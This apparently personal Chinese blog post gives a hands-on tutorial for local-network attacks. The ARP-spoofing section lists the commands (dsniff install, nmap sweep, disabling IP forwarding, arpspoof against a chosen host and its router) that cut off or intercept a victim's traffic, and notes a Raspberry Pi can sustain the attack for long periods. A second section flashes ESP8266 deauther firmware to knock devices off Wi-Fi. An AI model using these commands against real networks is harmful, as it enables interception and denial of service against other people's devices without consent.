你忍受侮辱和委屈,不敢公开说你跟正直和自由的人站在一边,你自己也做假,还微微地笑,你这样做无非是为了混一口饭吃,得到一个温暖的角落,做个一钱不值的小官儿罢了。
安东·巴甫洛维奇·契诃夫,『套中人』

ARP Spoofing

apt install dsniff
nmap -sP 192.168.86.1/26
echo 0 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 192.168.86.30 -r 192.168.86.1

ARP 欺骗主要原理为伪造复制攻击对象 MAC 地址,给路由器地址大量发送虚假信息导致流量接受后全部被转发到攻击主机。注意第三行,攻击完成后需改回 1 要不然如果机器上开了代理服务会失效,流量无法被通过,nmap 也可以用 Fing 等工具代替。内网攻击下此方法较为有效,树莓派后台挂载后可持续很久,安卓的类似傻瓜产品有防蹭网大师、Zanti 以及 cSploit 等,也可以考虑安卓版 Kali 版

ESP8266

相较于树莓派这样的单片机,MCU 价格更加便宜,启动速度达到了毫秒级别,耗电量也极少。因此,针对 ESP8266 的 deauther 诞生了,其他类似项目还有 WIFI-PWN

pip install esptool
#连上 ESP8266 后定位串口数
esptool.py --port COM5 erase_flash
#清除内存
esptool.py --port COM5 --baud 115200 write_flash -fm dio -fs 32m 0x00000 NODEMCU.bin
#开始烧录

烧录部分也可以使用 Arduino 编译。该项目主要利用了 2009 年前 802.11 下的 Deauthentication Frame 特性,用于在不知道无线网络密码的情况下断开对方网络,因为在当时这些管理数据包是未加密的,所以只需要对方路由器和希望从网络断开连接的客户端设备地址。该项目后来引起了无线联盟的注意修订了 802.11w-2009 协议,在今天新出场的大多数路由器都采用了加密的管理数据包。测试后发现唯独只有智能插座受到了影响直接断连,其余设备皆为无效。因此剩下的功能 Beacon 最为实用,其他也只能用于路由器安全性测试。

Reference

玩点什么